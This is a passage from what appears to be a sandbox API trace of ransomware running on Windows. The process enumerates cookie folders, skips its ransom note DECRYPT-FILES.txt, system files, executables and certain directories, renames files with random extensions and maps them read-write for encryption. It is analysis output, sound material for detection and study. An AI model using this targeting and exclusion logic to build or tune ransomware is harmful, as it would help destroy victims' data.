(lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0182.067] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0182.067] lstrlenA (lpString="DECODEPOINTER") returned 13 [0182.067] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0182.067] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0182.067] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0182.067] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0182.067] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0182.067] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0182.067] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0182.067] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0182.067] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0182.067] lstrlenA (lpString="DELETEATOM") returned 10 [0182.067] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0182.067] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0182.067] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0182.067] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0182.067] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0182.067] lstrlenA (lpString="DELETEFIBER") returned 11 [0182.067] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0182.067] lstrlenA (lpString="DELETEFILEA") returned 11 [0182.067] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0182.067] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0182.067] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0182.067] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0182.067] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0182.067] lstrlenA (lpString="DELETEFILEW") returned 11 [0182.068] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0182.068] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0182.068] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0182.068] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0182.068] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0182.068] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0182.068] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0182.068] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0182.068] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0182.068] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0182.068] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0182.068] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0182.068] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0182.068] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0182.068] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0182.068] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0182.068] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0182.068] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0182.068] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0182.068] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0182.068] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0182.068] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0182.068] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0182.068] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0182.068] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0182.068] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0182.068] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0182.068] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0182.068] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0182.068] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0182.068] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0182.068] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0182.068] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0182.068] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0182.069] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0182.069] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0182.069] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0182.069] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0182.069] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0182.069] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0182.069] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0182.069] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0182.069] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0182.069] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0182.069] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0182.069] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0182.069] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0182.069] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0182.069] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0182.069] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0182.069] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0182.069] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0182.069] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0182.069] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0182.069] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0182.069] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0182.069] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0182.069] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0182.069] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0182.069] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0182.069] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0182.069] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0182.069] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0182.069] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0182.069] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0182.069] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0182.069] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0182.070] lstrcpyW (in: lpString1=0x8b0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0182.070] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@www.linkedin[1].txt.9FhO2n") returned 123 [0182.070] wsprintfW (in: param_1=0x36fd86c, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@www.linkedin[1].txt.9FhO2n.13VQRAL") returned 131 [0182.070] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@www.linkedin[1].txt.9FhO2n" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@www.linkedin[1].txt.9fho2n"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@www.linkedin[1].txt.9FhO2n.13VQRAL" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@www.linkedin[1].txt.9fho2n.13vqral"), dwFlags=0x0) returned 1 [0182.071] VirtualFree (lpAddress=0x8a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0182.071] VirtualFree (lpAddress=0x8b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0182.071] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0182.071] FindNextFileW (in: hFindFile=0x4799b8, lpFindFileData=0x36fe89c | out: lpFindFileData=0x36fe89c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4523d1d0, ftCreationTime.dwHighDateTime=0x1d2faf3, ftLastAccessTime.dwLowDateTime=0x526fc010, ftLastAccessTime.dwHighDateTime=0x1d2faf3, ftLastWriteTime.dwLowDateTime=0xabb41b40, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x50a, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5nrgjn0js_halpmcxz@www.msn[2].txt.btFrYj4", cAlternateFileName="5P5NRG~1.BTF")) returned 1 [0182.072] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@www.msn[2].txt.btFrYj4", lpString2="DECRYPT-FILES.txt") returned -1 [0182.072] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@www.msn[2].txt.btFrYj4", lpString2="autorun.inf") returned -1 [0182.072] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@www.msn[2].txt.btFrYj4", lpString2="boot.ini") returned -1 [0182.072] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@www.msn[2].txt.btFrYj4", lpString2="desktop.ini") returned -1 [0182.072] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@www.msn[2].txt.btFrYj4", lpString2="ntuser.dat") returned -1 [0182.072] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@www.msn[2].txt.btFrYj4", lpString2="iconcache.db") returned -1 [0182.072] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@www.msn[2].txt.btFrYj4", lpString2="bootsect.bak") returned -1 [0182.072] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@www.msn[2].txt.btFrYj4", lpString2="ntuser.dat.log") returned -1 [0182.072] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@www.msn[2].txt.btFrYj4", lpString2="thumbs.db") returned -1 [0182.072] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@www.msn[2].txt.btFrYj4", lpString2="Bootfont.bin") returned -1 [0182.072] lstrlenW (lpString="5p5nrgjn0js_halpmcxz@www.msn[2].txt.btFrYj4") returned 43 [0182.072] lstrcmpiW (lpString1="btFrYj4", lpString2="lnk") returned -1 [0182.072] lstrcmpiW (lpString1="btFrYj4", lpString2="exe") returned -1 [0182.072] lstrcmpiW (lpString1="btFrYj4", lpString2="sys") returned -1 [0182.072] lstrcmpiW (lpString1="btFrYj4", lpString2="dll") returned -1 [0182.072] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\") returned 76 [0182.072] lstrlenW (lpString="5p5nrgjn0js_halpmcxz@www.msn[2].txt.btFrYj4") returned 43 [0182.072] lstrcpyW (in: lpString1=0x36fe06c, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\" [0182.072] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\", lpString2="5p5nrgjn0js_halpmcxz@www.msn[2].txt.btFrYj4" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@www.msn[2].txt.btFrYj4") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@www.msn[2].txt.btFrYj4" [0182.072] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0182.072] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@www.msn[2].txt.btFrYj4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@www.msn[2].txt.btfryj4"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x284 [0182.073] GetFileSizeEx (in: hFile=0x284, lpFileSize=0x36fd838 | out: lpFileSize=0x36fd838*=1290) returned 1 [0182.073] CreateFileMappingW (hFile=0x284, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x288 [0182.073] MapViewOfFile (hFileMappingObject=0x288, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0182.111] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0182.111] CloseHandle (hObject=0x288) returned 1 [0182.111] CloseHandle (hObject=0x284) returned 1 [0182.111] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0182.111] FindNextFileW (in: hFindFile=0x4799b8, lpFindFileData=0x36fe89c | out: lpFindFileData=0x36fe89c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xab4b5ec0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xab4b5ec0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xab4b5ec0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0182.111] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0182.111] FindNextFileW (in: hFindFile=0x4799b8, lpFindFileData=0x36fe89c | out: lpFindFileData=0x36fe89c*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x4f090c50, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4f090c50, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xabb8de00, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x8108, dwReserved0=0x0, dwReserved1=0x0, cFileName="index.dat.Qb6J", cAlternateFileName="INDEXD~1.QB6")) returned 1 [0182.111] lstrcmpiW (lpString1="index.dat.Qb6J", lpString2="DECRYPT-FILES.txt") returned 1 [0182.111] lstrcmpiW (lpString1="index.dat.Qb6J", lpString2="autorun.inf") returned 1 [0182.111] lstrcmpiW (lpString1="index.dat.Qb6J", lpString2="boot.ini") returned 1 [0182.111] lstrcmpiW (lpString1="index.dat.Qb6J", lpString2="desktop.ini") returned 1 [0182.111] lstrcmpiW (lpString1="index.dat.Qb6J", lpString2="ntuser.dat") returned -1 [0182.111] lstrcmpiW (lpString1="index.dat.Qb6J", lpString2="iconcache.db") returned 1 [0182.111] lstrcmpiW (lpString1="index.dat.Qb6J", lpString2="bootsect.bak") returned 1 [0182.111] lstrcmpiW (lpString1="index.dat.Qb6J", lpString2="ntuser.dat.log") returned -1 [0182.111] lstrcmpiW (lpString1="index.dat.Qb6J", lpString2="thumbs.db") returned -1 [0182.111] lstrcmpiW (lpString1="index.dat.Qb6J", lpString2="Bootfont.bin") returned 1 [0182.111] lstrlenW (lpString="index.dat.Qb6J") returned 14 [0182.111] lstrcmpiW (lpString1="Qb6J", lpString2="lnk") returned 1 [0182.111] lstrcmpiW (lpString1="Qb6J", lpString2="exe") returned 1 [0182.112] lstrcmpiW (lpString1="Qb6J", lpString2="sys") returned -1 [0182.112] lstrcmpiW (lpString1="Qb6J", lpString2="dll") returned 1 [0182.112] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\") returned 76 [0182.112] lstrlenW (lpString="index.dat.Qb6J") returned 14 [0182.112] lstrcpyW (in: lpString1=0x36fe06c, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\" [0182.112] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\", lpString2="index.dat.Qb6J" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\index.dat.Qb6J") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\index.dat.Qb6J" [0182.112] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0182.112] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\index.dat.Qb6J" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\index.dat.qb6j"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x284 [0182.112] GetFileSizeEx (in: hFile=0x284, lpFileSize=0x36fd838 | out: lpFileSize=0x36fd838*=33032) returned 1 [0182.112] CreateFileMappingW (hFile=0x284, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x288 [0182.113] MapViewOfFile (hFileMappingObject=0x288, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0182.114] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0182.114] CloseHandle (hObject=0x288) returned 1 [0182.114] CloseHandle (hObject=0x284) returned 1 [0182.114] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0182.114] FindNextFileW (in: hFindFile=0x4799b8, lpFindFileData=0x36fe89c | out: lpFindFileData=0x36fe89c*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x4f090c50, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4f090c50, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xabb8de00, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x8108, dwReserved0=0x0, dwReserved1=0x0, cFileName="index.dat.Qb6J", cAlternateFileName="INDEXD~1.QB6")) returned 0 [0182.114] FindClose (in: hFindFile=0x4799b8 | out: hFindFile=0x4799b8) returned 1 [0182.114] CloseHandle (hObject=0x27c) returned 1 [0182.114] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x2bc9ae40, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xabbb3f60, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xabbb3f60, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Low\\", cAlternateFileName="")) returned 0 [0182.114] FindClose (in: hFindFile=0x479978 | out: hFindFile=0x479978) returned 1 [0182.115] CloseHandle (hObject=0x274) returned 1 [0182.115] FindNextFileW (in: hFindFile=0x479938, lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xab22e760, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xab22e760, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xab2548c0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0182.115] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0182.115] FindNextFileW (in: hFindFile=0x479938, lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xabbb3f60, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xabbb3f60, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="IECompatCache", cAlternateFileName="IECOMP~1")) returned 1 [0182.115] lstrcmpW (lpString1="IECompatCache", lpString2=".") returned 1 [0182.115] lstrcmpW (lpString1="IECompatCache", lpString2="..") returned 1 [0182.115] lstrcatW (in: lpString1="IECompatCache", lpString2="\\" | out: lpString1="IECompatCache\\") returned="IECompatCache\\" [0182.115] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\", lpString2="IECompatCache\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\" [0182.115] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\", lpSrch="\\Program Files") returned 0x0 [0182.115] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\", lpSrch=":\\Windows") returned 0x0 [0182.115] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\", lpSrch="\\Games\\") returned 0x0 [0182.115] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\", lpSrch="\\Tor Browser\\") returned 0x0 [0182.115] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\", lpSrch="\\ProgramData\\") returned 0x0 [0182.115] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0182.115] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0182.115] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0182.115] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\", lpSrch="\\All Users") returned 0x0 [0182.115] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS 